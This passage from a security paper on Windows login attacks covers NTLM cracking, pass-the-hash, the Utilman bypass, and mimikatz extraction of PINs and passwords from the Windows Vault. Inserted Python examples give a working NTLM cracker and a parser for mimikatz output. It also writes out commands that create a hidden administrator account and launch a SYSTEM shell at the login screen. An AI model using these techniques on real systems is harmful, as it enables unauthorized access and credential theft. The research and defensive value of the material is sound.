There are two different hash algorithms, called LM (LAN Manager) and NTLM (NT LAN Manager). From Windows Vista and Server 2008, the LM hash has been disabled by default, but it can be enabled for backwards compatibility. An LM hash can be used for passwords of up to 14 characters and has a serious weakness. The password is uppercased and split into two halves, the first one seven characters and the second one the rest of the password, and each half is hashed independently. For example, a password of length 10 is split into one hash calculated from the first seven characters and one from the last three characters. This cuts the effective search space of a 14-character password from 2^84 to 2^37 combinations [McClure et al. 2009]. This makes cracking of LM hashes very fast, using for example rainbow tables, which
are pre-calculated tables of passwords and hashes. This paper will not go any further into the cracking of LM hashes, since this is out of scope for the paper. For more information see for example [McClure et al. 2009].

When it comes to NTLM hashes, there is a much bigger keyspace, but rainbow tables are still a very effective method for cracking these hashes, because the hash is not salted. The problem is that with NTLM's large keyspace, tables get very space consuming. One of the largest publicly available rainbow tables for NTLM today covers upper- and lower-case letters, the numbers 0-9 and space, for passwords of length 1 to 7 characters. This table is a little over 1 TB. Compare this with a rainbow table for LM hashes which covers all symbols on the keyboard and password lengths 1 to 7 (which in reality means 1 to 14, since the password is split in two) and is 34 GB [Freerainbowtables 2014]. Salting the hash means that a random value is added to the password before the hash algorithm is run, thereby creating different hashes when the same password is hashed twice. The password hashing mechanism in for example Linux salts its hashes. Salting the hash mitigates attacks like rainbow tables [McClure et al. 2009].

Lately it has also become very popular to use the GPU (Graphics Processing Unit) on graphics cards to increase the speed of cracking cryptographic hashes, since these are much more efficient at the simple mathematical operations used in hashing than regular CPUs. According to Jeremy Gosney (in a Twitter conversation with the author), one of the world's top experts in password cracking, with a regular graphics card like the AMD Radeon HD 7970 it is possible to brute-force NTLM hashes at approximately 20 billion passwords per second. With a cluster of graphics cards, this can be multiplied by the number of cards.
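To make the two properties described above concrete, the unsalted NT hash and LM's two independently attackable halves, here is an added Python example. It is not code from the paper or from any of the tools it cites. It computes NT hashes the way Windows stores them (MD4 over the UTF-16LE password, no salt), shows the LM key preprocessing that splits a password into two 7-byte halves (the DES step itself is left out), parses a constructed pwdump-style dump, and runs a small wordlist against it. MD4 is implemented in pure Python because hashlib's md4 is frequently unavailable; the account names, RIDs and wordlist are constructed for the example.

```python
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). Only here because hashlib's md4 is often
    missing under OpenSSL 3; a real cracker uses a native implementation."""
    msg = bytearray(data)
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", len(data) * 8)          # little-endian bit length

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    # (round function, additive constant, shift table, X[k] access order)
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = list(state)
        for fn, k, shifts, order in rounds:
            for i in range(16):
                t = (-i) % 4                # register updated this step: A, D, C, B, A, ...
                a, b, c = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
                v[t] = _rotl((v[t] + fn(a, b, c) + x[order[i]] + k) & MASK, shifts[i % 4])
        state = [(s + w) & MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def ntlm_hash(password: str) -> str:
    """NT hash as stored in the SAM: MD4 over UTF-16LE, no salt, no iteration."""
    return md4(password.encode("utf-16-le")).hex()


def lm_halves(password: str):
    """LM key preprocessing: uppercase, NUL-pad to 14 bytes, split into two
    independent 7-byte DES keys (the DES step is omitted here). Each half is
    cracked on its own, which is the collapse from 2^84 to 2^37 candidates."""
    raw = password.upper().encode("latin-1", "replace")[:14].ljust(14, b"\x00")
    return raw[:7], raw[7:]


def parse_pwdump(text: str) -> dict:
    """Parse pwdump-style lines 'user:rid:lmhash:nthash:::' into {user: nthash}."""
    hashes = {}
    for line in text.strip().splitlines():
        user, _rid, _lm, nt, *_ = line.split(":")
        hashes[user] = nt.lower()
    return hashes


def crack_ntlm(hashes: dict, wordlist) -> dict:
    """Because NT hashes are unsalted, one hash per candidate word covers every
    user at once (the same property that makes rainbow tables viable)."""
    lookup = {ntlm_hash(w): w for w in wordlist}
    return {user: lookup[h] for user, h in hashes.items() if h in lookup}


# Constructed sample dump. The LM field is the well-known "LM disabled" constant;
# the NT hashes for the two made-up accounts are generated right here.
SAMPLE_DUMP = "\n".join([
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",
    "jdoe:1001:aad3b435b51404eeaad3b435b51404ee:" + ntlm_hash("Password00") + ":::",
    "svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:" + ntlm_hash("c0rrect-h0rse-b4ttery") + ":::",
])
SAMPLE_WORDLIST = ["123456", "password", "Password00", "letmein"]   # constructed

if __name__ == "__main__":
    print(crack_ntlm(parse_pwdump(SAMPLE_DUMP), SAMPLE_WORDLIST))   # {'Administrator': 'password', 'jdoe': 'Password00'}
    print(lm_halves("Tr0ub4dor&3"))                                  # (b'TR0UB4D', b'OR&3\x00\x00\x00')
```

The svc_backup account survives because its password is not in the wordlist, which is the whole point of the paper's later pass-the-hash remark: an uncracked NT hash is still a usable credential.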
One downside of building machines for password cracking with graphics cards is that it gets rather expensive. In February 2014 an AMD Radeon HD 7970 cost approximately NOK 3000 in Norway. But why build your own password cracking machine when Amazon EC2 offers multiple graphics cards in its cloud instances, which can be rented for as little as $2 per hour [Amazon 2014]?

It is very common to use large dictionaries to shorten the time needed to crack a password. Today, after numerous leaks of large password databases, it is no problem for adversaries to create very effective dictionaries. The biggest password leak up till now is the leak of over 32,000,000 user accounts from the game producer RockYou in 2009 [Skullsecurity 2011]. Cracking password hashes can be done with tools like the following:

—John The Ripper
—L0phtCrack
—Cain & Abel
—Ophcrack
—oclHashcat
—Tools from ElcomSoft

If a computer is compromised, the NTLM hashes are extracted, and the adversary is not able to crack the password, the hash can still be useful. The hash can be used
in a so-called pass-the-hash attack, where the hash itself is used to authenticate to other systems on the same network as the adversary that use the same password as the compromised system, i.e. inter-system password re-use [Wolthusen 2014]. This can be done with tools like mimikatz and modifications of the psexec tool, which is included in the penetration testing framework Metasploit [Rapid7 2011]. This is a very effective attack in a Windows environment where the same administrator password is used on multiple computers, and it has been used on numerous penetration tests by the author of this paper, with a very high success rate. Up until Windows 8.1 and Windows Server 2012 R2, only a limited set of services could be reached with a pass-the-hash attack (an interactive Remote Desktop session was not among them), but there Microsoft implemented a security feature in the Remote Desktop Protocol (RDP) called Restricted Admin, which actually makes it possible to connect to an RDP service using a pass-the-hash attack [Falde 2013] [Ronin 2014] [Lowe 2013]. As with most other attacks on passwords in Windows, this can be done with mimikatz, but also with a better-known and recognized application called FreeRDP, which is an open implementation of the RDP protocol [Ronin 2014].

3.2 Clear-text password extraction

In recent years it has also become publicly known that, because of a feature in Windows called WDigest, it is possible to extract passwords in clear text from memory using tools like mimikatz [Delpy 2014b] [Delpy 2011] or Windows Credentials Editor [Amplia 2013]. WDigest is a DLL that was first added in Windows XP and is used to authenticate users against HTTP Digest authentication and Simple Authentication and Security Layer (SASL) exchanges. These two authentication methods require a plain-text password to be able to function.
To extract passwords from WDigest, the adversary needs access to a computer that is turned on and logged in, but how many average users lock their computer when they go to the toilet? Similar weaknesses also apply to other features implemented from Windows NT 6 (Windows Vista and Windows Server 2008), like when Single Sign-On (SSO) to Remote Desktop is enabled (tspkg) [Delpy 2014d], when a Microsoft Live account is used (LiveSSP, a Security Support Provider) [Delpy 2012], and for the Kerberos SSP. Actually, in Windows 8.1 wdigest and tspkg are disabled by default, but when SSO for websites or RDP is enabled, wdigest and tspkg are enabled too. The password stored in memory in all these scenarios is actually encrypted, but the keys are held in the same LSASS process, so decrypting it is trivial. The standard Windows function LsaProtectMemory is used for encryption, and LsaUnprotectMemory for decryption [Pilkington 2012]. More methods for extracting passwords in clear text will follow when we later discuss some new vulnerabilities in Windows 8.

3.3 Bypassing login authentication

The techniques discussed so far assume that the adversary already has access to the victim system, either by being a user of a multi-user system who wants to forge the identity of other users of the same system, or an adversary who has gained access to a system that is powered on and already logged in. But what if the system is shut down or locked? Let us discuss some classical options to bypass the
login authentication in Windows. Some of these attacks have been known all the way back to Windows XP, but are still not fixed in Windows 8.1.

Password reset

Probably the best-known and most-used Windows login bypass is the use of bootable media to edit the SAM file. This trick is very simple, but it can leave easily found traces that an adversary has accessed the system. It works by booting the system with another operating system, most often a small Linux distribution, and editing the SAM file, which was discussed earlier. This works like a charm since Windows is not running. With tools like the Offline NT Password and Registry Editor developed by Petter Nordahl-Hagen [Hagen 2014], it is possible to do things like:

—Change or clear a user's password
—Enable disabled accounts
—Create new users
—Remove users
—Change a user's group

To access a system without leaving any easy-to-find traces, the adversary could create a new user, add it to the administrators group, log in to the system and at the end delete the newly added user.

msv1_0.dll patching at boot time

If creating a new user is not desired, patching the DLL file msv1_0.dll can be a nice option. This DLL is called by the Local Security Authority (LSA), mentioned earlier, and processes login data collected by the Credential Providers (Credential Providers replaced the better-known GINA from Windows Vista [Griffin 2007]) for the Winlogon process [Microsoft 20xx]. At boot time, this can be done using tools like Kon-Boot [thelead82 2013]. This application silently bypasses the login authentication on any modern Windows operating system by patching msv1_0.dll when it is loaded into memory. The patch causes the password check to always return true, so that no account requires a password, without overwriting any stored passwords.
The way this tool is used is to boot the computer from some kind of external medium (CD, DVD, USB stick, etc.); a Kon-Boot boot screen is then displayed while the tool is working. Then, when the Windows login screen is visible, select the user you want to log in as and log in without any password. When the computer is then rebooted, the victim logs in like he always has, with his good old password. As a side note, Kon-Boot is also available for Apple OS X, but it works in a different way there.

msv1_0.dll patching with FireWire

IEEE 1394, commonly known as FireWire, is another interesting case when it comes to bypassing Windows login authentication. The problem with FireWire is that it has direct access to physical memory addresses (DMA), making it possible to patch msv1_0.dll just as mentioned earlier, but this time at run time. This attack was
first demonstrated using a modified iPod running Linux and a script called winlockpwn in 2008 [Spylogic 2008]. Neither iPod-Linux nor the winlockpwn tool is updated anymore, but thanks to Carsten Maartmann-Moe, a new tool called Inception, based on winlockpwn, was released in 2011 [Maartmann-Moe 2011]. Most new computers today do not have a FireWire port, but for an adversary this is in many cases not a problem. FireWire ports can be bought as PCMCIA cards, and when one of these is inserted into the computer's PCMCIA port, the drivers are installed automatically, even if the computer is locked. An interesting point here is that the FireWire attack can also be used when the hard disk in the computer is encrypted with for example BitLocker, if the computer is not shut down but only locked. As another side note, Inception is also able to bypass the password on Apple OS X and Ubuntu.

Utilman bypass

This again is a very old and quite well-known trick, and Microsoft has actually recommended this technique for bypassing a forgotten password. It was possible already in Windows 2000, so why it is still possible in Windows 8.1 is a mystery. The technique takes advantage of a utility called Utilman, which is used for the accessibility features Magnifier, Narrator and On-Screen Keyboard. This utility is available at the login screen in all newer Windows versions and can be opened by pressing the Windows key together with the letter U. The problem is that if the system is booted with for example a Linux live CD, and the adversary can access the files on the hard disk, he can remove or rename the file utilman.exe, which is located in %systemroot%\system32, and then copy cmd.exe to utilman.exe.
When the system is then rebooted and the login screen once again appears, the adversary can press Win+U, and a command prompt window running with SYSTEM privileges will pop up. See Figure 2. The file sethc.exe, which is also located in %systemroot%\system32, can be exploited in a very similar way. This file is used for the "Sticky Keys" feature of Windows, and it runs if the user presses the "shift" key five times in a row. If cmd.exe is copied to sethc.exe, and the "shift" key is pressed five times at the login screen, the command prompt will again pop up [Dieterle 2014]. If a command prompt is not good enough for the adversary, he can add users, change passwords, delete users and so on using Windows' net commands, since the prompt is running as SYSTEM. For example, create a user with

    net user evilhacker * /add

(the * makes net prompt for the password) and add it to the administrators group with

    net localgroup administrators evilhacker /add

Login screensaver

Another not so well-known trick, which works for Windows 7 and Windows 8.x and is in a way related to the utilman.exe bypass, is to enable a screensaver at the login screen, but instead of a screensaver for example cmd.exe is started (the screensaver file pointed to below is replaced with a copy of cmd.exe). This can be done by adding the following REG_SZ values to the registry key HKEY_USERS\.DEFAULT\Control Panel\Desktop [Superuser 2012]:

    SCRNSAVE.EXE = C:\WINDOWS\SYSTEM32\LOGON.SCR
    ScreenSaveActive = 1
    ScreenSaveIsSecure = 0
    ScreenSaveTimeOut = 10   (time in seconds before the screensaver starts)

Then, at the login screen, after for example 10 seconds, the cmd.exe window will pop up with SYSTEM privileges. Now, let us finish the old stuff and cough up something new(ish).

4. PRESENTING: WINDOWS 8

Finally, the essentials of this paper: the login authentication methods that are new in Windows 8. We start with some background material about the "root of all evil", the Data Protection Application Programming Interface and the Windows Vault.

4.1 Data Protection Application Programming Interface and Windows Vault

First a little about DPAPI, about which it is very difficult to find any official information. Books like "Windows Internals", which in most cases answer almost anything about the internals of Windows, do not contain any information about the Windows Vault or the Data Protection Application Programming Interface (DPAPI). The only information available from Microsoft is the public interface to DPAPI; no internal details are published. Can it be because of the serious vulnerabilities in these features of Windows? There have been multiple attempts at reverse engineering DPAPI. The best sources are the Russian company Passcape [Passcape 2012a] and the paper "Recovering Windows Secrets and EFS Certificates Offline" [Burzstein and Picod 2010] by Elie Bursztein et al., which presents a complete reverse engineering of DPAPI. Together with this paper, Bursztein et al. also released an application called DPAPIck, which can be used to decrypt DPAPI secrets offline. The paper is highly recommended if the reader wants to learn the detailed internals of DPAPI.

From Windows 2000, Microsoft has included a special data protection interface, called the Data Protection Application Programming Interface, DPAPI for short.
This interface is used to easily store sensitive data on disk under Windows. DPAPI is currently used by many Windows applications and subsystems, handling tasks like the Encrypting File System, wireless network key storage, Internet Explorer, Outlook, Skype, Credential Manager, the Windows Vault and so on. Each encrypted unit is called a "blob". DPAPI is considered very easy to use for encryption (CryptProtectData) and decryption (CryptUnprotectData) of data, and is therefore very popular among programmers. The Russian company Passcape was the first to release software capable of decrypting and extracting data which had been encrypted with DPAPI on a live system.

In theory, DPAPI sounds very secure. It uses well-known and proven cryptographic algorithms. Windows 7, for example, uses AES-256 encryption in CBC mode, SHA-512 for hashing, and PBKDF2 as the password-based key derivation routine. There is no available information about the cryptographic algorithms used in Windows 8.x, but we can assume they are the same as in Windows 7. This sounds secure, but there are weaknesses. The operating system needs to be able to read data protected by DPAPI without any dialogue with the user. Therefore the keys needed to decrypt DPAPI blobs must be in memory once they have been decrypted from the master key file. This is what tools like the ones from Passcape and
mimikatz use to extract login passwords from a running Windows system, which will be discussed in the following sections. Up until Windows 8, it was only possible to extract data about the currently logged-in user on the actual system using DPAPI. With DPAPI-NG in Windows 8, it is possible to decrypt and extract data for all users, even if the files used by DPAPI are extracted and imported into another system. As mentioned, the Windows Vault uses DPAPI to encrypt and store passwords used by applications in Windows and by Windows itself. The Windows Vault was introduced in Windows 7 as a replacement for the Credential Manager used in earlier versions of Windows. The Windows Vault is what is used by the PIN, picture password and fingerprint login authentication.

4.2 PIN codes and their vulnerabilities

The main thing to be worried about when it comes to PIN codes as login authentication in Windows 8 is that Microsoft only gives you the option to use four digits. This reduces the keyspace drastically, to 10,000 combinations, and when humans choose the PINs there is a pretty big chance it will be relatively easy to guess, especially if the adversary has some knowledge about the victim. One can wonder why on earth Microsoft limited PIN codes to four digits. There has been significant research done on the security of PIN codes. Research on the statistics of PIN codes extracted from password leaks like the one from RockYou, mentioned earlier, has ended up in some interesting facts about PIN codes. Research has been done, among others, by Joseph Bonneau et al. at the University of Cambridge [Bonneau et al. 2012] and the company DataGenetics [DataGenetics 2012].
Below is a table showing the 20 most used PIN codes, from a statistical analysis of 3,400,000 PIN codes done by DataGenetics in 2012 [DataGenetics 2012].

    Nr   PIN    Frequency
     1   1234   10.713%
     2   1111    6.016%
     3   0000    1.881%
     4   1212    1.197%
     5   7777    0.745%
     6   1004    0.616%
     7   2000    0.613%
     8   4444    0.526%
     9   2222    0.516%
    10   6969    0.512%
    11   9999    0.451%
    12   3333    0.419%
    13   5555    0.395%
    14   6666    0.391%
    15   1122    0.366%
    16   1313    0.304%
    17   8888    0.303%
    18   4321    0.293%
    19   2001    0.290%
    20   1010    0.285%
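As an added example (my own code, not from the paper or from DataGenetics), the following Python turns the table above into the two numbers a practitioner actually wants: how likely an attacker is to get in after n guesses of the most common PINs compared with a uniformly random PIN, and a policy check that rejects a candidate PIN for the reasons the table makes visible. The pattern heuristics (repeated digits, runs, year-like values, straight keypad columns) are this example's own assumptions, chosen to match the entries in the table; they are not from the cited study.

```python
# Top-20 PINs and their frequencies in percent, copied from the table above
# [DataGenetics 2012].
TOP20 = [
    ("1234", 10.713), ("1111", 6.016), ("0000", 1.881), ("1212", 1.197),
    ("7777", 0.745), ("1004", 0.616), ("2000", 0.613), ("4444", 0.526),
    ("2222", 0.516), ("6969", 0.512), ("9999", 0.451), ("3333", 0.419),
    ("5555", 0.395), ("6666", 0.391), ("1122", 0.366), ("1313", 0.304),
    ("8888", 0.303), ("4321", 0.293), ("2001", 0.290), ("1010", 0.285),
]
TOTAL_PINS = 10 ** 4
# Assumption of this example: digits that sit in one column of a phone keypad.
KEYPAD_COLUMNS = ("1470", "0741", "2580", "0852", "3690", "0963")


def success_after_guesses(n: int) -> float:
    """Probability that trying the n most common PINs in order succeeds
    (n <= 20), if the victim chose like the population in the table."""
    return sum(freq for _, freq in TOP20[:n]) / 100.0


def uniform_success_after_guesses(n: int) -> float:
    """The same quantity for a uniformly random four-digit PIN."""
    return n / TOTAL_PINS


def pin_weaknesses(pin: str) -> list:
    """Reasons a four-digit PIN is a poor choice; an empty list means none of
    the checks fired. Intended as an enrollment-time policy check."""
    if not (len(pin) == 4 and pin.isdigit()):
        return ["not a four-digit PIN"]
    reasons = []
    if pin in dict(TOP20):
        reasons.append("in the top-20 list")
    if len(set(pin)) == 1:
        reasons.append("single repeated digit")
    if pin[:2] == pin[2:]:
        reasons.append("repeated digit pair")
    digits = [int(c) for c in pin]
    steps = {digits[i + 1] - digits[i] for i in range(3)}
    if steps in ({1}, {-1}):
        reasons.append("ascending or descending run")
    if 1900 <= int(pin) <= 2030:
        reasons.append("looks like a year")
    if pin in KEYPAD_COLUMNS:
        reasons.append("straight keypad column")
    return reasons


if __name__ == "__main__":
    for n in (1, 5, 20):
        print(n, "guesses:", round(success_after_guesses(n), 4),
              "vs uniform", uniform_success_after_guesses(n))
    for candidate in ("1234", "2580", "2000", "8604"):
        print(candidate, pin_weaknesses(candidate))
```

With twenty guesses the attacker succeeds about 27% of the time against the table's population, versus 0.2% against a random PIN; the check flags John Doe's 2580 from the mimikatz listing later in this section as a keypad column even though it is not in the top 20.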
Enough about general PIN code vulnerabilities. The rest of this section actually applies not only to the use of PIN codes in Windows 8; it also applies to picture passwords and, to some degree, to the fingerprint login. It is discussed in this section because this paper handles PIN codes first. Information and vulnerabilities that only apply to picture passwords and fingerprints are discussed in later sections.

In 2012 it became publicly known that Windows 8 stores login passwords in an easily recoverable way when PIN or picture password is in use. This is because they are stored in the Windows Vault, which uses DPAPI, as discussed earlier in this paper. Using a tool from Passcape it was possible to easily extract the users' passwords in clear text [Passcape 2012c]. On the 8th of January 2014, I came in contact with Benjamin Delpy aka "gentilkiwi" on Twitter, the man behind the open-source tool mimikatz, and asked him questions on how this was done. A few hours later he had included this feature in mimikatz. Some days later Mr Delpy published a post on his blog describing how this was done [Delpy 2014e].

The extraction of the regular password, the PIN code and the picture password coordinates using mimikatz is shown below. Running mimikatz:

    privilege::debug
    token::elevate
    vault::list
    exit

Note that some uninteresting lines are removed from the output to save space in this paper.

      .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Mar 2 2014 22:44:55)
     .## ^ ##.
     ## / \ ##  /* * *
     ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
      '#####'                                    with 14 modules * * */

    mimikatz(commandline) # privilege::debug
    Privilege '20' OK

    mimikatz(commandline) # token::elevate
    Token Id  : 0
    User name :
    SID name  : NT AUTHORITY\SYSTEM
    <snip>
    <snip>
    mimikatz(commandline) # vault::list
    Vault : {4bf4c442-9b8a-41a0-b380-dd4a704ddb28}
    <snip>
            0.  Picture Password Credential
    <snip>
    *** Picture Password ***
    User     : venue\John Doe
    Password : Password00
    Picture password (grid is 150*100)
     [0] line  (x = 17 ; y = 5) -> (x = 33 ; y = 65)
     [1] point (x = 70 ; y = 21)
     [2] point (x = 80 ; y = 20)

            1.  PIN Logon Credential
    <snip>
    *** Pin Logon ***
    User     : venue\John Doe
    Password : Password00
    PIN Code : 2580

            2.  PIN Logon Credential
    <snip>
    *** Pin Logon ***
    User     : venue\Jane Doe
    Password : TopSecret123!
    PIN Code : 1234
    <snip>

When combining mimikatz with Kon-Boot, mentioned earlier, it is possible to bypass login authentication and extract login credentials for all users of the system. This is also valid when the computer and user are members of an Active Directory domain. So even though the adversary does not get access to domain resources when using authentication bypass tools like Kon-Boot or the Inception FireWire attack, he can compromise a domain account with the following steps:

(1) Bypass authentication with for example Kon-Boot or Inception
(2) Extract passwords from the Vault using mimikatz
(3) Reboot the computer
(4) Log in with the valid credentials obtained in the previous steps
(5) Jackpot! The adversary has access to the victim's domain resources

It is also very interesting to know that the password vault is global, so once logged in to a system as an administrator, the user can extract login credentials for all users of the system. Instead of bypassing the login with tools like Kon-Boot, mimikatz can also be run in the SYSTEM-privileged cmd.exe from the Utilman authentication bypass attack, as shown in Figure 2.
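As an added example (my own code, not part of the paper and not part of mimikatz), here is a Python parser for the vault::list output format shown above. It turns the dump into structured records and then collapses them per user, which is what you want both as an attacker collecting credentials and as an incident responder working out what was exposed from a dump left on a compromised host. The sample text is constructed from the listing above with the same fictitious users, password, PIN codes and gesture coordinates; circle gestures do not appear in the sample and are only matched generically by the gesture regex.

```python
import re

# Constructed sample: the relevant lines of the vault::list output above.
SAMPLE_OUTPUT = """\
mimikatz(commandline) # vault::list
Vault : {4bf4c442-9b8a-41a0-b380-dd4a704ddb28}
        0.  Picture Password Credential
*** Picture Password ***
User     : venue\\John Doe
Password : Password00
Picture password (grid is 150*100)
 [0] line  (x = 17 ; y = 5) -> (x = 33 ; y = 65)
 [1] point (x = 70 ; y = 21)
 [2] point (x = 80 ; y = 20)
        1.  PIN Logon Credential
*** Pin Logon ***
User     : venue\\John Doe
Password : Password00
PIN Code : 2580
        2.  PIN Logon Credential
*** Pin Logon ***
User     : venue\\Jane Doe
Password : TopSecret123!
PIN Code : 1234
"""

HEADER_RE = re.compile(r"^\*\*\* (.+?) \*\*\*$")
FIELD_RE = re.compile(r"^(User|Password|PIN Code)\s*:\s*(.*)$")
POINT = r"\(x = (\d+) ; y = (\d+)\)"
GESTURE_RE = re.compile(r"^\s*\[\d+\]\s+(\w+)\s+" + POINT + r"(?:\s*->\s*" + POINT + r")?")


def parse_vault_list(text: str) -> list:
    """Split the output into one record per '*** ... ***' credential block.
    Each record has 'type', 'user', 'password', optionally 'pin', and a list of
    gestures with 'kind', 'start' and (for lines) 'end' grid coordinates."""
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        m = HEADER_RE.match(stripped)
        if m:
            current = {"type": m.group(1), "gestures": []}
            records.append(current)
            continue
        if current is None:          # banner, Vault GUID and index lines are skipped
            continue
        m = FIELD_RE.match(stripped)
        if m:
            key = m.group(1).lower().replace(" code", "")   # User/Password/PIN Code
            current[key] = m.group(2).strip()
            continue
        m = GESTURE_RE.match(line)
        if m:
            kind, x1, y1, x2, y2 = m.groups()
            gesture = {"kind": kind, "start": (int(x1), int(y1))}
            if x2 is not None:
                gesture["end"] = (int(x2), int(y2))
            current["gestures"].append(gesture)
    return records


def clear_text_credentials(records: list) -> dict:
    """Collapse records to user -> {password, pins, gestures}: the set of
    secrets that must be considered compromised once the Vault was readable."""
    out = {}
    for r in records:
        entry = out.setdefault(r["user"], {"password": None, "pins": [], "gestures": 0})
        entry["password"] = r.get("password", entry["password"])
        if "pin" in r:
            entry["pins"].append(r["pin"])
        entry["gestures"] += len(r["gestures"])
    return out


if __name__ == "__main__":
    for user, creds in clear_text_credentials(parse_vault_list(SAMPLE_OUTPUT)).items():
        print(user, creds)
```

Every exposed item is keyed by user, so a domain-joined host's dump immediately gives the list of accounts whose domain password must be reset, not just the local ones.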
Fig. 2. cmd.exe running as utilman.exe on the Windows 8.1 login screen.

4.3 Picture password and its vulnerabilities

Picture password is a new login authentication method in Windows 8, based on the gesture authentication previously in use on both Android and iOS touchscreen devices. The way this method works is that the user defines three gestures used for authentication. Each of the three gestures can be either a single point, a circle or a line, on a 100 by 150 grid laid over the chosen picture. In the mimikatz output in the section above about PIN codes, the coordinates for the different gestures on the picture in Figure 3 are shown. The line (1) goes from the top to the bottom of The Terminator's shotgun, the first point (2) is the left lens of his sunglasses, and the second point (3) is the right lens.

If Microsoft fixes these issues, the picture password method looks very promising, with a high number of possible combinations, and it is easy to use on touchscreen devices. As mentioned in the section about PINs, the vault attack is the same when using a picture password.

There also exist a couple of not so technical attacks on touchscreen devices, for both PIN and picture password. The smudge attack is a method to find the gesture pattern used to unlock touchscreen devices using this form of authentication. This attack relies on detecting the smudge left on the screen by grease from the user's fingers. Using proper lighting, camera settings and image-processing software, both a gesture and a PIN code can in many cases be recovered. This attack was
first made publicly known by a research team from the University of Pennsylvania at the 4th USENIX Workshop on Offensive Technologies [Aviv et al. 2010]. The smudge attack is in many ways similar to the case of number keypads where some keys are more worn than others, which in many cases makes it possible for an adversary to see the commonly used digits. Another weakness both PIN codes and picture passwords may be more exposed to is shoulder surfing [Long and Mitnick 2011], since it is much easier to see a gesture on a picture than the characters typed on a keyboard.

Fig. 3. The picture password login screen, with coordinates.

4.4 Fingerprints and their vulnerabilities

From Windows 8.1, Windows got native support for fingerprint login authentication [Microsoft 2013]. Knowing this, and how the PIN and picture password functions store their credentials, I was curious how this was done with fingerprints. Not able to find any information about this, I once again asked Benjamin Delpy, on the 20th of January. On the 23rd, he had implemented this in mimikatz as well [Delpy 2014f]. It turns out that, as suspected, the fingerprint login stores its information in the same way as PIN and picture password, in the Vault. Therefore it is also possible to extract the login password when fingerprint login is in use. With more knowledge on the subject, I was able to find that Passcape had already implemented this in their commercial "Windows Vault Explorer" in 2012 [Passcape 2012b]. In addition, the fingerprint authentication in Windows is of course vulnerable to all the classical attacks on fingerprint readers, like a fingerprint printed on paper, latex fingers, etc. This can be seen in for example the Discovery Channel show MythBusters, episode 59, "Crimes and Myth-Demeanors 2" [Mythbusters 2006].
4.5 Multi-factor login authentication and its vulnerabilities

On the 23rd of February, Benjamin Delpy once again proved his skills and released a new feature in mimikatz. It was now possible to extract the PIN code used when a smart card is used instead of a password for Windows login authentication [Delpy 2014c]. According to Mr Delpy, this is valid when the native Windows support for smart cards is used. Because of a lack of equipment to test the extraction of smart card PIN codes, this has not been experimented with for this paper. Not much information about this attack has been released yet, so there is not much publicly available information about how it is done, but it can be assumed that it works very similarly to the extraction of passwords when PIN and picture password are used; see Figure 4.

Fig. 4. A smart card's PIN code extracted with the use of mimikatz [Delpy 2014c].

5. CONCLUSION

Many of the attacks mentioned in this paper seem like they are from a Hollywood spy movie, but this is the reality. Microsoft has some strange vulnerabilities in its login authentication, and there is no simple explanation for why they are still there. Both I and others have tried to get in touch with the Microsoft security team to get answers on why these techniques are still possible, but with no luck. People who are into computer security, as the reader of this paper probably is, tend to be aware of the risks to their computers, but the average person does not think of this.

One of the most important security measures for computers and other computer-like devices is the use of Full Disk Encryption (FDE). This will prevent an adversary from accessing data on the computer's hard disk, and thereby also prevent an adversary from bypassing the login to the operating system.
From Windows 7, Microsoft has included an FDE method called BitLocker, which is very easy to set up and simple to use. The user of the computer will not notice the existence of
BitLocker, except by a very slight decrease in performance [Hardware 2010]. If FDE is not an option, for some reason, security measures like a BIOS password or a hard disk password can also be used. A BIOS password does not prevent an adversary from removing the hard disk from the computer and retrieving either the password hashes from the SAM file or the Windows Vault from the vault files. What it prevents is, for example, the use of tools like Kon-Boot or other live CDs/DVDs/pendrives capable of either resetting passwords or extracting hashes, when the adversary is not able to remove the disk. Hard disk passwords, also known as ATA passwords, are something else entirely. Some company policies consider them just as good as FDE, but this is not disk encryption; it merely uses a part of the ATA standard for hard disks, and in many cases there exists a master password that overrides the one set by the user [ISEE0XDEADDISKS 2008]. Firewire attacks bypass all protection of the hard disk if a user has locked a logged-in system. To mitigate this, the Firewire and/or PCMCIA port must be disabled in some way, or automatic PCMCIA driver installation should be disabled. The final conclusion of this paper must be: never leave your computer unattended!

REFERENCES

Amazon. 2014. Amazon EC2 pricing. http://aws.amazon.com/ec2/pricing/. Accessed: 21.feb.2014.
Amplia. 2013. Windows credential manager. http://www.ampliasecurity.com/research/windows-credentials-editor/. Accessed: 6.mar.2014.
Aviv, A. J., Gibson, K., Mossop, E., Blaze, M., and Smith, J. M. 2010. Smudge attacks on smartphone touch screens. In Proceedings of the 4th USENIX Conference on Offensive Technologies. USENIX Association, 1–7.
Bonneau, J., Preibusch, S., and Anderson, R. 2012. A birthday present every eleven wallets? The security of customer-chosen banking PINs. In Financial Cryptography and Data Security. Springer, 25–40.
Bursztein, E. and Picod, J. M. 2010. Recovering Windows secrets and EFS certificates offline. In Proceedings of the 4th USENIX Conference on Offensive Technologies. USENIX Association, Berkeley, USA.
DataGenetics. 2012. PIN analysis. http://www.datagenetics.com/blog/september32012/. Accessed: 7.jan.2014.
